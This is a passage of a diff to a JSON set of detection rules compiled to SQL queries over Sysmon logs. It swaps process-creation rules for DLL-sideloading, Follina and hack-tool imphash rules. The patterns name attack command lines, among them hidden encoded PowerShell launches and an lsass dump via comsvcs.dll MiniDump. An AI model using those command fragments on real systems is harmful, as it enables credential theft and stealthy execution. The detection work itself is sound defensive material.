arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "status": "experimental", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in 
its command line" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "test", + "description": 
"Detects WMI command line event consumers", + "author": "Thomas Patzke", + "tags": [ + "attack.t1546.003", + "attack.persistence" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "falsepositives": [ + "Unknown (data set is too small; further testing needed)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + ], + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) 
loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070" ], "falsepositives": [ - "Possible but rare" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "status": "experimental", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = 
'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft 
(idea)", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - 
"attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", - "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL 
side-loading attacks", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "status": "experimental", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', 
'959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', 
'3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' 
ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", + "status": "experimental", + "description": "Detects potential suspicious winget package installation from a suspicious source.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + 